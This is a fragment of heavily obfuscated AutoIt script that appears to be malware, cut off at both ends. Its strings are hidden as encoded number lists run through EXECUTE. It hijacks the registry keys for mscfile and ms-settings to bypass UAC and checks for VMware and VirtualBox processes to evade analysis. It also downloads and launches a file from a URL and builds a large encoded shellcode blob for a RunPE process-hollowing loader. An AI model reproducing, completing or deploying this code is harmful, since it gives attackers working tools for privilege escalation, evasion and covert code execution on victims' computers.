("28,35,40,27,44,51,46,41,45,46,44,35,40,33" ) ) LOCAL $SPLIT = $E ($B (BTBXJYMRFGAETPA ("53,50,58,56,60,57,60,55,59,62,59,5,59,60,58,56,60,53,59,3,59,62,60,57,55,61,55,57,59,62,59,5,60,53,60,58,60,57,55,3,55,53,55,55,55,55,55,62" ) ) ) FOR $I = BTBXJYMRFGAETPA ("54" ) TO $SPLIT [BTBXJYMRFGAETPA ("53" ) ] $RESULT &= $E ($B (BTBXJYMRFGAETPA ("53,50,57,56,59,61,60,55,58,60,55,61,57,55,59,62,60,57,58,61,57,6,58,55,55,61,57,54,60,56,59,56,55,61,55,57,60,56,60,53,59,3,59,62,60,57,58,2,55,57,59,62,58,4,55,62,55,3,55,53,55,57,59,2,59,58,60,62,55,62,55,62" ) ) ) NEXT RETURN $RESULT ENDFUNC FUNC GTIQUIETGC () $GOWQQZFKJDEL ("HKCU\Software\Classes\mscfile\shell\open\command" , "" , "REG_SZ" , $RPXLQCDPMYWXAMHGBQJLUKGTWUMRCSLUOUUNBYGLQPOG ) $LYDOYURNNHSZ (BTBXJYMRFGAETPA ("31,48,31,40,46,48,49,44" ) ) $FEYVUXLEGFHL ($FJVRHISHSSHJEPWQMMUMBIFRUFCKXVFVZNRK ) ENDFUNC FUNC BROSTHGPRZHK () RETURN EXECUTE (BTBXJYMRFGAETPA ("4,38,38,3,27,38,38" ) ) ENDFUNC FUNC AVXCRDFDANXY () RETURN EXECUTE (BTBXJYMRFGAETPA ("9,45,1,30,39,35,40" ) ) ENDFUNC FUNC VGPSDSMHIF ($LOOP , $TIME ) FOR $I = BTBXJYMRFGAETPA ("53" ) TO $LOOP LOCAL $A = $GODTWHVWYOIN (BTBXJYMRFGAETPA ("53,50,61,61" ) , BTBXJYMRFGAETPA ("53,50,58,58" ) ) $A = $ROAVRSIHXASO ($A , $A + BTBXJYMRFGAETPA ("54" ) ) $UBAKYTACSQES ($TIME / $LOOP ) NEXT ENDFUNC FUNC MSQGWYVXLW () $SPAYPUCWZKBI ("kernel32.dll" , BTBXJYMRFGAETPA ("28,41,41,38,31,27,40" ) , BTBXJYMRFGAETPA ("23,41,49,59,57,5,40,27,28,38,31,23,41,49,59,57,6,45,18,31,30,35,44,31,29,46,35,41,40" ) , BTBXJYMRFGAETPA ("28,41,41,38,31,27,40" ) , BTBXJYMRFGAETPA ("53" ) ) $GOWQQZFKJDEL ("HKCU\Software\Classes\ms-settings\shell\open\command" , BTBXJYMRFGAETPA ("4,31,38,31,33,27,46,31,5,50,31,29,47,46,31" ) , "REG_SZ" , BTBXJYMRFGAETPA ("14,47,38,38" ) ) $GOWQQZFKJDEL ("HKCU\Software\Classes\ms-settings\shell\open\command" , "" , "REG_SZ" , $RPXLQCDPMYWXAMHGBQJLUKGTWUMRCSLUOUUNBYGLQPOG ) $LYDOYURNNHSZ (BTBXJYMRFGAETPA ("32,41,30,34,31,38,42,31,44" ) ) $FEYVUXLEGFHL ($FJVRHISHSSHJEPWQMMUMBIFRUFCKXVFVZNRK ) ENDFUNC FUNC RJSCXWPQPGLT () RETURN EXECUTE (BTBXJYMRFGAETPA ("4,38,38,19,46,44,47,29,46,7,31,46,4,27,46,27" ) ) ENDFUNC FUNC LSVTGEQXOY () LOCAL $ARRAY = ["vmtoolsd.exe" , "vbox.exe" ] FOR $I = BTBXJYMRFGAETPA ("53" ) TO $YFYLLVZDUQRC ($ARRAY ) - BTBXJYMRFGAETPA ("54" ) IF $QJGZOLGPHKUD ($ARRAY [$I ] ) THEN $FEYVUXLEGFHL ($FJVRHISHSSHJEPWQMMUMBIFRUFCKXVFVZNRK ) ENDIF NEXT ENDFUNC FUNC ECSYIKARWBOW () RETURN EXECUTE (BTBXJYMRFGAETPA ("6,35,38,31,3,38,41,45,31" ) ) ENDFUNC FUNC UELUVLCZRM ($SOCCURRENCENAME ) LOCAL $E = EXECUTE LOCAL $B = $E (BTBXJYMRFGAETPA ("2,35,40,27,44,51,20,41,19,46,44,35,40,33" ) ) LOCAL $AHANDLE = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,2,59,58,60,55,59,5,59,58,59,3,56,56,56,55,55,5,59,57,59,3,59,3,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,55,57,56,60,55,59,58,59,54,60,57,59,58,57,4,60,58,60,57,59,58,60,61,58,60,55,55,55,3,55,53,55,55,60,56,60,57,60,55,60,58,59,56,60,57,55,1,55,55,55,3,55,53,55,55,56,53,55,55,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,56,54,55,55,55,3,55,53,55,55,60,60,60,56,60,57,60,55,55,55,55,3,55,53,55,57,60,56,57,6,59,56,59,56,60,58,60,55,60,55,59,58,59,5,59,56,59,58,57,5,59,54,59,4,59,58,55,62" ) ) ) LOCAL $ALASTERROR = $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,2,59,58,60,55,59,5,59,58,59,3,56,56,56,55,55,5,59,57,59,3,59,3,55,55,55,3,55,53,55,55,59,57,60,60,59,6,60,55,59,57,55,55,55,3,55,53,55,55,57,60,59,58,60,57,57,3,59,54,60,56,60,57,57,58,60,55,60,55,59,6,60,55,55,55,55,62" ) ) ) IF $ALASTERROR [BTBXJYMRFGAETPA ("53" ) ] = BTBXJYMRFGAETPA ("54,61,56" ) THEN $E ($B (BTBXJYMRFGAETPA ("53,50,57,57,59,3,59,3,57,56,59,54,59,3,59,3,55,61,55,55,59,2,59,58,60,55,59,5,59,58,59,3,56,56,56,55,55,5,59,57,59,3,59,3,55,55,55,3,55,53,55,55,59,55,59,6,59,6,59,3,55,55,55,3,55,53,55,55,57,56,59,3,59,6,60,56,59,58,57,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,55,59,61,59,54,59,5,59,57,59,3,59,58,55,55,55,3,55,53,55,57,59,54,57,61,59,54,59,5,59,57,59,3,59,58,58,2,55,55,56,53,55,55,58,4,55,62" ) ) ) $E ($B (BTBXJYMRFGAETPA ("53,50,58,53,60,55,59,6,59,56,59,58,60,56,60,56,57,56,59,3,59,6,60,56,59,58,55,61,57,53,57,54,60,58,60,57,59,6,57,62,60,57,57,58,60,61,59,58,55,62" ) ) ) ENDIF ENDFUNC FUNC AAMNHDQEEW ($URL , $PATH ) IF $BOOL = BTBXJYMRFGAETPA ("6,27,38,45,31" ) THEN $EQNGFPRNKMDT ($URL , $IEHDDOIYHINMPBUCHBHARTDUKILWZQCUVDTRYHUFIM & "\" & $PATH ) $LYDOYURNNHSZ ($IEHDDOIYHINMPBUCHBHARTDUKILWZQCUVDTRYHUFIM & "\" & $PATH ) ENDIF ENDFUNC FUNC DZMXWPBFDJEK () RETURN EXECUTE (BTBXJYMRFGAETPA ("2,35,46,1,14,4" ) ) ENDFUNC FUNC RUNPE ($PROCESS , $DATA , $PROTECT , $PERSIST ) LOCAL $LMASCGP $LMASCGP &= BTBXJYMRFGAETPA ("53,50,56,60,60,6,57,55,56,5,57,54,56,54,56,59,57,55,56,60,56,60,56,60,56,60,56,55,56,55,56,6,57,58,57,55,57,57,57,58,56,6,56,56,57,56,56,55,57,59,56,60,56,60,56,60,56,60,56,6,56,57,57,55,57,57,56,59,56,56,56,54,56,54,56,57,56,5,56,60,56,57,56,53,56,56,56,60,56,56,56,57,56,57,57,57,56,60,57,55,57,58,56,53,57,54,56,6,57,58,56,56,56,57,56,57,57,57,56,6,56,59,56,57,57,57,56,59,56,6,56,55,56,60,56,56,56,55,56,60,56,60,56,60,56,60,56,53,56,55,57,54,56,60,56,6,57,58,56,56,56,56,56,59,56,6,56,53,56,6,56,6,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,54,56,55,57,54,56,6,56,60,56,60,56,60,56,57,57,57,56,57,56,6,57,58,56,55,56,60,56,58,56,60,56,6,57,58,56,56,56,6,56,59,56,6,56,55,56,54,56,6,57,58,56,53,56,60,56,59,57,57,56,60,56,57,57,56,56,57,56,60,56,57,57,54,56,57,56,55,56,53,56,6,56,5,56,56,57,56,57,54,56,60,56,6,56,55,57,57,56,5,56,53,56,56,56,56,57,54,56,6,57,58,56,56,56,60,56,58,56,56,56,60,56,57,57,57,56,57,56,6,56,5,56,56,56,55,57,55,57,57,56,6,57,58,56,56,56,55,57,54,56,6,56,6,57,58,56,60,57,57,56,6,56,58,56,6,57,58,56,56,56,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,60,56,6,56,60,56,57,57,57,57,58,56,6,56,5,56,56,56,55,57,54,56,56,56,6,57,58,56,56,56,55,57,54,56,56,56,6,57,59,56,60,56,60,56,6,56,6,56,56,56,55,57,54,57,54,56,6,57,59,56,60,56,59,56,60,57,54,57,58,57,55,56,53,57,56,57,54,57,54,56,6,56,6,56,56,56,55,57,54,57,55,56,60,57,54,57,58,57,55,57,57,56,60,56,58,57,58,57,54,56,6,57,54,57,54,56,56,56,55,57,54,56,56,56,6,56,60,56,53,57,56,57,54,57,54,56,60,56,60,56,53,56,56,56,60,57,58,56,56,56,59,56,6,56,60,56,53,57,56,57,54,57,55,56,60,56,60,56,53,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,56,56,56,6,56,55,57,54,57,54,56,53,56,56,57,56,56,54,56,6,56,55,57,54,57,54,56,53,56,56,56,59,56,57,57,54,57,54,56,56,56,55,57,54,56,6,56,6,57,58,56,56,56,55,57,54,56,6,56,57,57,58,56,56,56,55,57,54,56,60,56,53,56,58,57,58,56,5,56,57,56,57,57,57,56,60,56,55,57,54,56,55,57,55,57,57,56,5,57,57,56,58,56,60,56,56,56,60,56,60,56,6,57,58,56,56,56,55,57,55,57,57,56,6,57,58,56,56,57,56,57,54,56,6,56,60,57,54,57,58,56,53,56,60,56,56,56,56,56,6,56,6,57,58,56,60,56,56,56,6,56,54,56,60,56,57,57,57,56,57,57,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,58,57,55,56,5,56,55,56,55,56,6,57,58,57,55,57,57,56,6,56,57,57,55,57,57,56,55,57,57,56,54,56,56,56,6,57,58,56,60,57,56,56,57,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,55,56,57,56,55,56,54,56,6,57,58,57,54,56,60,56,57,56,57,57,57,56,60,56,6,56,5,56,56,56,55,57,54,57,57,56,6,56,5,56,56,56,55,57,54,56,6,56,6,57,58,56,56,56,5,56,60,57,57,56,6,57,58,56,56,56,5,56,59,56,56,56,6,57,58,56,60,56,5,56,6,57,58,56,55,56,5,56,59,56,60,56,55,56,53,57,57,56,53,56,56,56,55,57,56,56,60,56,56,57,55,56,53,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,57,54,56,53,56,60,57,57,56,53,56,56,56,55,57,56,56,56,56,54,56,55,56,54,57,55,56,55,56,57,56,54,56,55,57,57,56,53,56,56,56,55,57,56,56,6,56,54,56,57,56,53,56,56,56,54,56,5,56,54,57,54,56,54,56,54,57,57,56,53,56,56,56,55,57,56,57,57,56,54,57,55,56,60,56,60,57,57,56,53,56,56,56,55,57,58,57,57,56,56,57,55,56,53,56,56,56,56,57,56,56,54,56,59,57,57,56,53,56,56,56,55,57,57,56,60,56,53,56,60,56,55,56,54,56,54,56,5,56,54,56,55,57,57,56,53,56,56,56,55,57,57,56,56,56,53,56,53,56,56,57,54,56,54,56,54,56,55,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,57,56,53,56,56,56,55,57,57,56,6,56,54,56,55,56,54,56,57,56,53,56,56,56,54,56,5,56,54,56,54,57,57,56,53,56,56,56,55,57,57,57,57,56,54,57,54,56,54,57,55,56,6,56,6,56,56,56,55,57,57,57,55,56,57,57,58,57,56,56,6,56,53,56,55,56,60,56,53,56,57,56,57,57,57,56,60,57,55,56,5,57,59,56,5,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,56,56,56,56,55,57,56,56,60,56,55,56,60,57,55,56,6,57,56,57,54,57,54,57,55,57,54,57,54,57,54,57,54,56,6,57,58,57,54,56,6,56,6,57,56,56,56,56,55,57,58,57,57,56,55,56,60,57,55,56,6,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,6,56,5,56,56,56,55,57,54,56,60,56,6,57,56,56,56,56,55,57,55,56,6,56,55,56,60,56,54,56,56,57,59,56,59,56,57,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,58,56,56,56,60,56,60,57,57,56,6,57,58,56,56,56,60,56,59,56,56,56,6,57,58,56,60,56,60,56,6,57,58,56,55,56,6,56,59,56,60,57,57,56,53,56,56,56,55,57,55,56,6,56,53,56,53,56,54,56,57,56,53,56,57,56,54,57,57,56,54,56,54,57,57,56,53,56,56,56,55,57,55,57,57,56,54,56,55,56,54,57,55,57,57,56,54,56,56,56,55,57,55" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,55,56,60,56,60,57,55,56,6,57,59,56,54,57,54,57,55,57,54,57,54,57,54,57,54,56,55,56,54,56,6,56,5,56,53,56,55,57,55,56,56,57,54,57,54,57,56,56,60,56,60,56,57,57,57,56,60,56,54,56,54,56,6,56,5,56,56,56,55,57,55,56,60,56,54,56,54,56,6,56,5,56,56,56,55,57,55,56,58,56,6,57,56,56,56,56,55,57,55,56,60,56,55,56,5,56,6,56,5,56,56,56,55,57,59,57,57,56,6,57,56,56,56,56,55,57,59,56,56,56,55,56,60,56,57,56,57,57,54,56,54,56,54,57,59,56,60,57,57,56,6,57,56,56,56,56,55,57,54,56,56,56,55,56,60,57,57,56,53,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("55,57,59,56,56,56,59,56,6,56,60,56,60,56,60,56,60,56,60,56,60,56,6,56,5,56,53,56,55,57,59,56,6,57,57,56,53,56,56,56,55,57,58,56,60,56,56,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,56,5,56,53,56,55,57,58,56,56,56,6,56,5,56,53,56,55,57,58,56,6,57,54,57,54,57,56,56,53,56,6,56,55,57,57,56,60,56,60,57,54,56,6,56,6,56,53,56,57,57,54,57,54,57,54,57,54,57,54,57,54,56,54,57,59,56,60,56,58,56,55,56,54,56,54,57,59,56,60,56,59,56,6,57,56,56,56,56,55,57,54,56,6,56,55,56,60,56,55,56,54,56,55,56,54,56,55,56,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,6,57,56,56,56,56,55,57,54,57,57,56,55,56,60,56,54,57,59,57,54,57,54,57,54,57,54,56,53,56,55,57,54,56,56,57,54,57,54,56,55,56,55,57,54,56,60,56,6,56,55,57,57,56,60,56,60,57,54,56,6,56,6,56,55,56,57,57,54,57,54,57,54,57,54,57,54,57,54,56,6,57,58,56,56,56,55,57,54,57,57,56,55,57,54,56,55,57,55,56,55,57,58,57,57,56,5,57,57,56,57,56,55,56,55,56,6,57,58,57,55,57,57,56,55,56,59,56,55,56,59,56,54,56,56,57,59,56,59,56,57,56,60,56,60,56,60,56,60,56,60,56,60,56,60,56,6,57,58,56,56,56,60,56,60,57,57,56,6,56,57,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,56,60,56,59,56,56,56,6,57,58,56,60,56,6,56,55,56,57,56,55,56,54,56,55,56,53,56,6,56,5,56,56,56,55,57,54,56,6,56,57,57,58,57,57,56,6,57,55,57,58,56,57,56,58,56,6,57,58,56,56,56,5,56,58,56,6,56,6,57,58,56,53,57,56,56,60,56,6,56,60,57,54,57,58,56,53,56,59,56,53,56,60,57,54,57,58,56,53,56,57,56,59,56,6,57,58,57,56,57,55,56,6,57,58,57,57,56,58,56,58,57,58,57,57,56,57,56,6,56,57,57,57,56,53,56,60,56,58,56,54,56,54,56,6,56,55,57,56,56,58,56,53,56,56,56,60,57,57,56,6,56,57,57,57,56,59,56,60,56,58,56,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,54,56,6,56,55,57,54,56,54,56,53,56,56,56,60,56,56,56,6,56,55,57,57,56,60,56,53,56,56,57,55,56,60,56,6,56,55,57,57,56,60,56,6,57,58,56,56,56,55,57,54,57,57,56,53,56,56,56,59,56,57,56,6,57,58,56,60,56,6,56,57,57,58,56,56,57,56,57,54,56,6,56,6,56,5,56,56,57,56,57,54,57,57,56,53,56,55,57,57,56,5,56,57,56,57,57,57,56,60,56,55,57,54,56,55,57,55,56,55,57,58,57,57,56,5,57,57,56,58,56,60,56,56,56,60,56,60,56,6,57,58,56,56,56,60,56,59,56,60,57,55,57,58,57,54,56,56,56,55,56,55,56,6,57,58,57,55,57,57,57,58,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,56,54,56,60,56,59,56,55,56,60,56,60,56,60,56,60,57,55,56,6,56,59,57,58,56,59,57,55,56,60,56,60,56,60,56,60,56,57,56,58,57,57,56,60,56,55,56,57,56,55,56,54,56,55,56,53,57,57,56,53,56,6,56,55,56,60,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,56,56,54,56,54,56,5,56,54,57,55,56,54,56,56,57,57,56,53,56,6,56,55,56,60,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,58,56,54,56,55,56,53,56,57,56,54,57,54,57,57,56,53,56,6,56,55,56,60,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,55,56,53,56,58,56,54,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,54,56,55,56,54,56,54,57,57,56,53,56,6,56,55,56,60,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,53,56,60,56,60,57,57,56,53,56,6,56,55,57,59,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,56,57,57,56,54,57,54,56,54,56,59,56,54,56,56,57,57,56,53,56,6,56,55,57,59,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,58,56,54,56,55,56,53,56,57,56,54,57,54,57,57,56,53,56,6,56,55,57,58,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,55,56,53,56,58,56,54,56,57,56,54,56,55,56,6,56,6,56,6,56,55,57,58,56,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,56,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,57,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,55,56,57,56,54,56,5,56,53,57,59,56,54,56,55,57,57,56,53,56,6,56,55,56,57,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,54,56,55,56,58,56,54,56,55,57,57,56,53,56,6,56,55,56,57,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,57,56,54,57,54,56,53,56,55,56,53,56,58,56,54,56,54,57,57,56,53,56,6,56,55,56,57,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,56,57,56,54,56,55,56,6,56,6,56,6" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,57,57,55,57,54,57,57,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,57,58,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,56,57,57,56,54,57,54,56,54,56,57,56,54,57,58,57,57,56,53,56,6,56,55,57,58,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,56,58,56,54,56,55,56,53,56,57,56,54,57,54,57,57,56,53,56,6,56,55,57,57,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,55,56,53,56,58,56,54,56,57,56,54,56,55,56,6,56,6,56,6,56,55,57,57,56,56,57,54,57,56,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,55,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,59,56,53,56,55,57,57,56,53,56,6,56,55,56,55,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,53,56,5,56,55,56,57,57,57,56,53,56,6,56,55,56,54,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,5,56,53,56,57,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,56,54,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,56,56,56,56,5,56,54,57,55,56,54,56,54,57,57,56,53,56,6,56,55,56,54,56,6,57,54,56,5,57,54,57,54,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,54,57,54,56,53,56,58,56,54,57,56,56,54,56,59,57,57,56,53,56,6,56,55,56,54,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,5,56,54,57,54,56,54,57,55,56,6,56,6,56,6,56,55,56,53,56,60,57,54,56,5,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,5,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,56,56,59,56,54,57,57,57,57,56,53,56,6,56,55,56,5,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,57,56,54,57,54,56,54,56,57,56,54,56,59,57,57,56,53,56,6,56,55,56,5,56,6,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,56,5,57,54,57,54,57,54,57,54,56,53,56,56,56,54,56,55,56,55,56,54,56,54,56,5,57,57,56,53,56,6,56,55,56,5,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,58,56,53,56,56,56,53,56,55,56,54,56,59,57,57,56,53,56,6,56,55,57,59,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,57,56,56,57,56,56,54,56,55,56,54,57,56,57,57,56,53,56,6,56,55,57,59,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,54,56,53,56,58,56,53,56,5,56,60,56,60,57,57,56,53,56,6,56,55,56,58,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,55,56,53,56,56,56,56,57,54,56,53,56,60,57,57,56,53,56,6,56,55,56,58,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,55,56,54,57,55,56,55,56,60,56,53,56,58,57,57,56,53,56,6,56,55,56,58,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,57,56,54,56,55,56,53,56,57,56,54,56,54,57,57,56,53,56,6,56,55,56,58,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,57,56,60,56,60,57,57,56,53,56,6,56,55,56,58,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,56,57,55,56,53,56,56,56,55,56,59,56,53,56,55,57,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("53,56,6,56,55,56,58,56,56,57,54,56,5,57,54,57,54,57,54,57,54,56,54,56,55,56,53,56,58,56,53,56,5,56,56,56,5,57,57,56,53,56,6,56,55,56,58,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,55,56,54,56,54,56,54,57,54,56,53,56,58,57,57,56,53,56,6,56,55,56,58,57,57,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,56,56,54,56,59,56,53,56,56,56,54,56,5,57,57,56,53,56,6,56,55,56,57,56,60,57,54,56,5,57,54,57,54,57,54,57,54,56,54,57,54,56,54,57,55,56,55,56,60,56,53,56,58,57,57,56,53,56,6,56,55,56,57,56,56,57,54,56,5" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,54,57,54,57,54,57,54,56,54,57,54,56,54,56,57,56,54,56,55,56,53,56,57,56,54,56,54,57,57,56,53,56,6,56,55,56,57,56,6,57,54,56,5,57,54,57,54,57,54,57,54,56,53,56,57,56,60,56,60,57,57,56,53,56,6,56,55,57,55,56,60,57,54,57,57,57,54,57,54,57,54,57,54,56,56,56,53,56,54,56,55,56,53,56,56,56,55,56,57,57,57,56,53,56,6,56,55,57,55,56,56,57,54,57,57,57,54,57,54,57,54,57,54,56,53,56,5,56,53,56,57,56,53,56,56,56,54,56,55,57,57,56,53,56,6,56,55,57,55,56,6,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,56,56,56,56,5,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,55,56,54,56,54,56,54,56,54,57,57,56,53,56,6,56,55,57,55,57,57,57,54,57,57,57,54,57,54,57,54,57,54,56,54,57,54,56,60,56,60,57,57,56,53,56,56,56,55,57,58,56,6,56,54,57,56,56,54,56,58,56,53,56,57,56,53,56,56,57,57,56,53,56,56,56,55,57,58,57,57,56,54,57,54,56,53,56,53,56,54,56,57,56,53,56,57,56,6,56,6,56,56,56,55,57,57,56,60,57,57,56,53,56,56,56,55,57,56,56,56,56,53,56,57,56,53,56,56,56,53,56,58,56,54,57,57,56,54,56,54,57,57,56,53,56,56,56,55,57,56,56,6,56,54,56,55,56,54,57,55,56,6,56,6,56,56,56,55,57,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("57,59,57,57,56,53,56,6,56,55,56,57,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,56,57,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,56,56,56,60,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,57,56,57,56,57,56,58,57,57,56,53,56,6,56,55,56,56,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,54,57,55,56,53,56,56,56,54,56,56,57,57,56,53,56,6,56,55,56,56,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("6,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,57,57,56,58,57,55,56,54,56,56,56,54,56,54,57,57,56,53,56,6,56,55,56,56,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,54,57,57,56,6,56,6,56,6,56,55,56,56,57,55,57,54,57,55,57,54,57,54,57,54,57,54,57,57,56,53,56,6,56,55,56,6,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,56,5,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,6,56,55,56,5,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,57,56,57,56,57,56,58,57,57,56,53,56,6,56,55,56,5,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,55,57,57,56,54,56,59,56,54,56,56,56,53,56,54,57,57,56,53,56,6,56,55,56,5,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,54,56,59,56,53,56,60,56,54,56,5,56,57,56,57,57,57,56,53,56,6,56,55,57,59,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,57,56,58,56,58,57,55,56,54,56,56,56,54,57,57,56,54,56,54,57,57,56,53,56,6,56,55,57,59,56,56,57" ) $LMASCGP &= BTBXJYMRFGAETPA ("54,57,56,57,54,57,54,57,54,57,54,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,56,56,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,56,56,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,56,56,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,57,56,57,56,57,56,58,57,57,56,53,56,6,56,55,56,56,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,57,57,56,54,57,58,56,54" ) $LMASCGP &= BTBXJYMRFGAETPA ("56,55,56,53,56,58,57,57,56,53,56,6,56,55,56,55,56,60,57,54,57,56,57,54,57,54,57,54,57,54,56,54,57,55,56,54,56,55,56,54,57,57,56,57,56,57,57,57,56,53,56,6,56,55,56,55,56,56,57,54,57,56,57,54,57,54,57,54,57,54,56,57,56,58,56,58,57,55,56,54,56,56,56,54,57,57,56,54,56,54,57,57,56,53,56,6,56,55,56,55,56,6,57,54,57,56,57,54,57,54,57,54,57,54,56,54,57,57,56,60,56,60,57,57,56,53,56,6,56,55,57,54,57,57,57,54,57,56,57,54,57,54,57,54,57,54,56,55,57,57,56,56,57,58,56,54,57,55,56,54,57,54,57,57,56,53,56,6,56,55,56,60,56" ) $LMASCGP &= BTBXJYMRFGAETPA ("60,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,53,56,54,57,55,56,56,56,56,56,54,57,57,57,57,56,53,56,6,56,55,56,60,56,56,57,54,57,55,57,54,57,54,57,54,57,54,56,54,57,57,56,53,56,57,56,57,56,57,56,57,56,58,57,57,56,53,56,6,56,55,56,60,56,6,57,54,57,55,57,54,57,54,57,54,57,54,56,55,57,57,56,53,56,55,56,53,56,57,56,54,56,55,57,57,56,53,56,6,56,55,56,60,57,57,57,54,57,55,57,54,57,54,57,54,57,54,56,53,56,58,56,57,56,57,56,57,56,58,56,58,57,55,57,57,56,53,56,6,56,55,56,59,56,60,57,54,57,55,57,54,57,54,57,54,57,54" ) $LMASCGP &= BTBXJYMRFGAETPA 